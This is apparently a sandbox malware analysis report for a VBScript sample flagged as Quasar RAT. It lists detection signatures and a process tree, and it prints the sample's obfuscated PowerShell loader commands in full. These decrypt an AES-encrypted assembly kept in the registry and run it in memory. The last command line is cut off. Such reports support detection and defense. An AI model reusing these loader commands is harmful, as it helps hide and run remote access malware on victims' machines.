
Windows Analysis Report
test.vbs

Overview

General Information

Sample name: test.vbs
Analysis ID: 1612297
MD5: 3808fc59fa6559e0400c8c114757cb69
SHA1: a920afd77fcadfc2df8d5f7114c636f0938406f4
SHA256: 9b7f05da0f9dfe94f3b6dcb325e6eb08f50333d5bf7d88da97fbcb51986b1bf9

Detection

Quasar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Quasar RAT
.NET source code contains potential unpacker
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Writes registry values via WMI
Wscript starts Powershell (via cmd or directly)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7956 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 8116 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 8164 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = 
iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mrl3mal3mpl3mhl3myl3m.l3mCl3mil3mpl3mhl3mel3mrl3mMl3mol3mdl3mel3m]l3m:l3m:l3mCl3mBl3mCl3m'.Replace('l3m', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'j0D$j0DEj0DLj0Dpj0Dtj0DFj0D.j0DPj0Daj0Ddj0Ddj0Dij0Dnj0Dgj0D=j0D[j0DSj0Dyj0Dsj0Dtj0Dej0Dmj0D.j0DSj0Dej0Dcj0Duj0Drj0Dij0Dtj0Dyj0D.j0DCj0Drj0Dyj0Dpj0Dtj0Doj0Dgj0Drj0Daj0Dpj0Dhj0Dyj0D.j0DPj0Daj0Ddj0Ddj0Dij0Dnj0Dgj0DMj0Doj0Ddj0Dej0D]j0D:j0D:j0DPj0DKj0DCj0DSj0D7j0D'.Replace('j0D', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire 'RLv$RLvERLvLRLvpRLvtRLvFRLv.RLvKRLveRLvyRLv=RLv[RLvSRLvyRLvsRLvtRLveRLvmRLv.RLvCRLvoRLvnRLvvRLveRLvrRLvtRLv]RLv:RLv:RLvFRLvrRLvoRLvmRLvBRLvaRLvsRLveRLv6RLv4RLvSRLvtRLvrRLviRLvnRLvgRLv(RLv$RLvHRLv2RLvoRLvURLvxRLv)RLv'.Replace('RLv', 
''); Invoke-Expression -InformationAction Ignore -Verbose 'KoR$KoREKoRLKoRpKoRtKoRFKoR.KoRIKoRVKoR=KoR[KoRSKoRyKoRsKoRtKoReKoRmKoR.KoRCKoRoKoRnKoRvKoReKoRrKoRtKoR]KoR:KoR:KoRFKoRrKoRoKoRmKoRBKoRaKoRsKoReKoR6KoR4KoRSKoRtKoRrKoRiKoRnKoRgKoR(KoR$KoRqKoRBKoRAKoRgKoRsKoR)KoR'.Replace('KoR', ''); $ZcGu0=$ELptF.CreateDecryptor(); $ES1U8=$ZcGu0.TransformFinalBlock($ti34n, $B8Dta, $ti34n.Length); $ZcGu0.Dispose(); $ELptF.Dispose(); $ES1U8; } Invoke-Expression -Debug -WarningAction Inquire -Verbose 'rgH$rgHIrgH0rgHjrgHzrgHKrgH=rgH[rgHMrgHirgHcrgHrrgHorgHsrgHorgHfrgHtrgH.rgHWrgHirgHnrgH3rgH2rgH.rgHRrgHergHgrgHirgHsrgHtrgHrrgHyrgH]rgH:rgH:rgHCrgHurgHrrgHrrgHergHnrgHtrgHUrgHsrgHergHrrgH.rgHOrgHprgHergHnrgHSrgHurgHbrgHKrgHergHyrgH(rgH$rgHZrgHXrgHcrgHfrgH8rgH)rgH'.Replace('rgH', ''); $Ka32q = $iSxCm; $Yvese = $I0jzK.GetValue($hBkVc); $Yvese = S2qwV($Yvese); Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore 'wPR$wPRRwPR6wPRawPRNwPRAwPR=wPR[wPRRwPRewPRfwPRlwPRewPRcwPRtwPRiwPRowPRnwPR.wPRAwPRswPRswPRewPRmwPRbwPRlwPRywPR]wPR:wPR:wPRLwPRowPRawPRdwPR(wPR[wPRbwPRywPRtwPRewPR[wPR]wPR]wPR$wPRYwPRvwPRewPRswPRewPR)wPR'.Replace('wPR', ''); $JVyjT = $R6aNA.EntryPoint; $YsCbW = [int]$JVyjT.Invoke($B8Dta,$kzu3X); if ($YsCbW -eq $Ka32q) {exit $Ka32q } else {exit $l8XQf}}" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7252 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = 
iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mrl3mal3mpl3mhl3myl3m.l3mCl3mil3mpl3mhl3mel3mrl3mMl3mol3mdl3mel3m]l3m:l3m:l3mCl3mBl3mCl3m'.Replace('l3m', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'j0D$j0DEj0DLj0Dpj0Dtj0DFj0D.j0DPj0Daj0Ddj0Ddj0Dij0Dnj0Dgj0D=j0D[j0DSj0Dyj0Dsj0Dtj0Dej0Dmj0D.j0DSj0Dej0Dcj0Duj0Drj0Dij0Dtj0Dyj0D.j0DCj0Drj0Dyj0Dpj0Dtj0Doj0Dgj0Drj0Daj0Dpj0Dhj0Dyj0D.j0DPj0Daj0Ddj0Ddj0Dij0Dnj0Dgj0DMj0Doj0Ddj0Dej0D]j0D:j0D:j0DPj0DKj0DCj0DSj0D7j0D'.Replace('j0D', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire 'RLv$RLvERLvLRLvpRLvtRLvFRLv.RLvKRLveRLvyRLv=RLv[RLvSRLvyRLvsRLvtRLveRLvmRLv.RLvCRLvoRLvnRLvvRLveRLvrRLvtRLv]RLv:RLv:RLvFRLvrRLvoRLvmRLvBRLvaRLvsRLveRLv6RLv4RLvSRLvtRLvrRLviRLvnRLvgRLv(RLv$RLvHRLv2RLvoRLvURLvxRLv)RLv'.Replace('RLv', 
''); Invoke-Expression -InformationAction Ignore -Verbose 'KoR$KoREKoRLKoRpKoRtKoRFKoR.KoRIKoRVKoR=KoR[KoRSKoRyKoRsKoRtKoReKoRmKoR.KoRCKoRoKoRnKoRvKoReKoRrKoRtKoR]KoR:KoR:KoRFKoRrKoRoKoRmKoRBKoRaKoRsKoReKoR6KoR4KoRSKoRtKoRrKoRiKoRnKoRgKoR(KoR$KoRqKoRBKoRAKoRgKoRsKoR)KoR'.Replace('KoR', ''); $ZcGu0=$ELptF.CreateDecryptor(); $ES1U8=$ZcGu0.TransformFinalBlock($ti34n, $B8Dta, $ti34n.Length); $ZcGu0.Dispose(); $ELptF.Dispose(); $ES1U8; } Invoke-Expression -Debug -WarningAction Inquire -Verbose 'rgH$rgHIrgH0rgHjrgHzrgHKrgH=rgH[rgHMrgHirgHcrgHrrgHorgHsrgHorgHfrgHtrgH.rgHWrgHirgHnrgH3rgH2rgH.rgHRrgHergHgrgHirgHsrgHtrgHrrgHyrgH]rgH:rgH:rgHCrgHurgHrrgHrrgHergHnrgHtrgHUrgHsrgHergHrrgH.rgHOrgHprgHergHnrgHSrgHurgHbrgHKrgHergHyrgH(rgH$rgHZrgHXrgHcrgHfrgH8rgH)rgH'.Replace('rgH', ''); $Ka32q = $iSxCm; $Yvese = $I0jzK.GetValue($hBkVc); $Yvese = S2qwV($Yvese); Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore 'wPR$wPRRwPR6wPRawPRNwPRAwPR=wPR[wPRRwPRewPRfwPRlwPRewPRcwPRtwPRiwPRowPRnwPR.wPRAwPRswPRswPRewPRmwPRbwPRlwPRywPR]wPR:wPR:wPRLwPRowPRawPRdwPR(wPR[wPRbwPRywPRtwPRewPR[wPR]wPR]wPR$wPRYwPRvwPRewPRswPRewPR)wPR'.Replace('wPR', ''); $JVyjT = $R6aNA.EntryPoint; $YsCbW = [int]$JVyjT.Invoke($B8Dta,$kzu3X); if ($YsCbW -eq $Ka32q) {exit $Ka32q } else {exit $l8XQf}}" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = 
Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -Debug -WarningAction Inquire -InformationAction Ignore 'jui$juiejuiyjuiyjuiQjuiHjui.juiPjuiajuidjuidjuiijuinjuigjui=jui[juiSjuiyjuisjuitjuiejuimjui.juiSjuiejuicjuiujuirjuiijuitjuiyjui.juiCjuirjuiyjuipjuitjuiojuigjuirjuiajuipjuihjuiyjui.juiPjuiajuidjuidjuiijuinjuigjuiMjuiojuidjuiejui]jui:jui:juiPjuiKjuiCjuiSjui7jui'.Replace('jui', ''); Invoke-Expression -Debug -Verbose 'YwM$YwMeYwMyYwMyYwMQYwMHYwM.YwMKYwMeYwMyYwM=YwM[YwMSYwMyYwMsYwMtYwMeYwMmYwM.YwMCYwMoYwMnYwMvYwMeYwMrYwMtYwM]YwM:YwM:YwMFYwMrYwMoYwMmYwMBYwMaYwMsYwMeYwM6YwM4YwMSYwMtYwMrYwMiYwMnYwMgYwM(YwM$YwMyYwMOYwMUYwM0YwMbYwM)YwM'.Replace('YwM', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire 
'TrU$TrUeTrUyTrUyTrUQTrUHTrU.TrUITrUVTrU=TrU[TrUSTrUyTrUsTrUtTrUeTrUmTrU.TrUCTrUoTrUnTrUvTrUeTrUrTrUtTrU]TrU:TrU:TrUFTrUrTrUoTrUmTrUBTrUaTrUsTrUeTrU6TrU4TrUSTrUtTrUrTrUiTrUnTrUgTrU(TrU$TrUpTrUKTrUdTrUSTrU6TrU)TrU'.Replace('TrU', ''); $mz2vU=$eyyQH.CreateDecryptor(); $YW2cj=$mz2vU.TransformFinalBlock($VHgBC, $RwltO, $VHgBC.Length); $mz2vU.Dispose(); $eyyQH.Dispose(); $YW2cj; } Invoke-Expression -Verbose -InformationAction Ignore -Debug 'QTL$QTLsQTLbQTL3QTLLQTLKQTL=QTL[QTLMQTLiQTLcQTLrQTLoQTLsQTLoQTLfQTLtQTL.QTLWQTLiQTLnQTL3QTL2QTL.QTLRQTLeQTLgQTLiQTLsQTLtQTLrQTLyQTL]QTL:QTL:QTLCQTLuQTLrQTLrQTLeQTLnQTLtQTLUQTLsQTLeQTLrQTL.QTLOQTLpQTLeQTLnQTLSQTLuQTLbQTLKQTLeQTLyQTL(QTL$QTLmQTLxQTLwQTLaQTLPQTL,QTL$QTLeQTLwQTLoQTLVQTL8QTL)QTL'.Replace('QTL', ''); $I9CGV = $sb3LK.GetValue($RGohu); $I9CGV = Yz1Gd($I9CGV); $sb3LK.DeleteValue($RGohu); Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'GkW$GkWEGkWHGkWQGkWOGkW4GkW=GkW[GkWRGkWeGkWfGkWlGkWeGkWcGkWtGkWiGkWoGkWnGkW.GkWAGkWsGkWsGkWeGkWmGkWbGkWlGkWyGkW]GkW:GkW:GkWLGkWoGkWaGkWdGkW(GkW[GkWbGkWyGkWtGkWeGkW[GkW]GkW]GkW$GkWIGkW9GkWCGkWGGkWVGkW)GkW'.Replace('GkW', ''); $qYlCF = $EHQO4.EntryPoint; $qYlCF.Invoke($RwltO,$jOK5y);}" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 